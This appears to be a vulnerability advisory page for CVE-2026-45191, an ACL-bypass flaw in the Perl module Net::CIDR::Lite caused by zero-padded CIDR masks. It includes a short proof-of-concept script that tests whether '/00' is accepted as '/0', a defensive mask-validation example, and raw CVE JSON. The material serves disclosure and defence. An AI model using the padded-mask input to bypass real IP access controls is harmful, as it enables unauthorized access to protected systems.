Security Vulnerability Report
CVE-2026-45191 CVSS 6.5 MEDIUM

CVE-2026-45191

Published: 2026-05-10 21:16:29
Last Modified: 2026-05-12 16:48:58
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

Net::CIDR::Lite versions before 0.24 for Perl do not properly consider extraneous zero characters in CIDR mask values, which may allow IP ACL bypass. Mask forms like "/00" and "/01" pass validation and parse to the same prefix as their unpadded value. See also CVE-2026-45190.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Net::CIDR::Lite < 0.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
perl
#!/usr/bin/perl
# PoC for CVE-2026-45191: Net::CIDR::Lite ACL Bypass via leading zeros
use strict;
use warnings;
use Net::CIDR::Lite;

print "[+] Testing for CVE-2026-45191 in Net::CIDR::Lite\n";

my $cidr = Net::CIDR::Lite->new;

# Attempt to add a CIDR range with a padded zero mask ('/00').
# In vulnerable versions (< 0.24), this passes validation.
# '/00' parses to '/0' (0.0.0.0/0), effectively allowing any IP.
eval { $cidr->add("192.168.1.0/00"); };

if ($@) {
    print "[-] Validation rejected '/00'. Module might be patched.\n";
} else {
    print "[!] Validation accepted '/00'. Checking range interpretation...\n";

    # Check if an arbitrary IP outside the intended '192.168.1.0/24' range matches.
    # If '/00' is parsed as '/0', 8.8.8.8 should match.
    my $test_ip = "8.8.8.8";
    if ($cidr->find($test_ip)) {
        print "[+] VULNERABLE: IP '$test_ip' matched range '192.168.1.0/00'.\n";
        print "    This implies '/00' was parsed as '/0', allowing ACL bypass.\n";
    } else {
        print "[-] IP '$test_ip' did not match. Behavior might be safe or different.\n";
    }
}
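
Added example (not part of the original report or of Net::CIDR::Lite): a strict pre-check that rejects the padded mask forms named in the description, such as "/00" and "/01", before an ACL entry is handed to the module. The check_cidr() helper and the sample ACL entries are hypothetical and constructed for illustration.

```perl
#!/usr/bin/perl
# Added example: audit ACL entries for non-canonical CIDR masks.
# check_cidr() and the sample entries below are hypothetical.
use strict;
use warnings;

# Returns nothing for a canonical entry, otherwise a reason string.
sub check_cidr {
    my ($entry) = @_;
    # Limit -1 keeps a trailing empty field, so "10.0.0.0/" is caught.
    my ($addr, $mask, $extra) = split m{/}, $entry, -1;
    return "missing mask"      unless defined $mask;
    return "more than one '/'" if defined $extra;
    # Canonical decimal only: "0", or digits with no leading zero.
    # \A and \z anchor the whole string, so a trailing newline fails too.
    return "non-canonical mask '$mask'"
        unless $mask =~ /\A(?:0|[1-9][0-9]{0,2})\z/;
    my $max = $addr =~ /:/ ? 128 : 32;    # treat ':' as IPv6
    return "mask /$mask exceeds /$max" if $mask > $max;
    return;
}

my @acl = (    # constructed sample entries
    "192.168.1.0/24",
    "192.168.1.0/00",
    "10.0.0.0/08",
    "10.0.0.0/8",
    "2001:db8::/032",
    "2001:db8::/32",
    "172.16.0.0/33",
);

my $bad = 0;
for my $entry (@acl) {
    my $why = check_cidr($entry);
    if (defined $why) {
        $bad++;
        print "REJECT $entry: $why\n";
    } else {
        # Only canonical entries should go on to Net::CIDR::Lite's add().
        print "ok     $entry\n";
    }
}
print "$bad of ", scalar(@acl), " entries rejected\n";
```

The check covers only the mask; the address part is still validated by whatever parser consumes the entry.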

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45191", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-10T21:16:29.380", "lastModified": "2026-05-12T16:48:58.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Net::CIDR::Lite versions before 0.24 for Perl does not properly consider extraneous zero characters in CIDR mask values, which may allow IP ACL bypass.\n\nMask forms like \"/00\" and \"/01\" pass validation and parse to the same prefix as their unpadded value.\n\nSee also CVE-2026-45190."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1289"}]}], "references": [{"url": "https://github.com/stigtsp/Net-CIDR-Lite/commit/24e2c439ec405e5256024b9acefd4f7008c5ed0c.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/STIGTSP/Net-CIDR-Lite-0.24/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://www.cve.org/CVERecord?id=CVE-2026-45190", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}]}}